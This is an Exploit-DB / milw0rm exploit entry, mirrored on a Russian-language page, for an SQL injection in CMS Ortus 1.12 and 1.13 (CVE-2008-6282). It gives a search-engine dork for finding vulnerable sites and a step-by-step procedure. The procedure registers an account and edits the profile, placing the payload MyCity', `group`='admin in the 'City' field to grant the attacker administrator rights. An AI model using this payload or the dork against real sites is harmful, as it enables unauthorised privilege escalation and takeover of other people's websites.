- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7237
- Проверка EDB
-
- Пройдено
- Автор
- OTMOROZOK428
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6282
- Дата публикации
- 2008-11-26
Код:
Author: otmorozok428, http://forum.antichat.ru
Products: CMS Ortus 1.12, CMS Ortus 1.13
Vendor: http://ortus.nirn.ru
Download: http://ortus.nirn.ru/files/ortus1-12.zip, http://ortus.nirn.ru/files/ortus1-13.zip
Dork (for ALL Versions of CMS Ortus): inurl:index.php?ortupg=
SQL Injection Vulnerability in POST Form:
http://www.site.com/index.php?mod=users_edit_pub
"City" field: [SQL Injection]
EXAMPLE:
1. You need to register first
http://www.site.com/index.php?mod=users_add
2. Authentication
http://www.site.com/index.php?mod=auth
3. Edit user profile next
http://www.site.com/index.php?mod=users_edit_pub
4. Exploit "City" field (receive admin rights)
MyCity', `group`='admin
5. Login to admin area
http://www.site.com/auth.php
You can see demo video here:
http://depositfiles.com/files/h8sbwikey
# milw0rm.com [2008-11-26]
- Источник
- www.exploit-db.com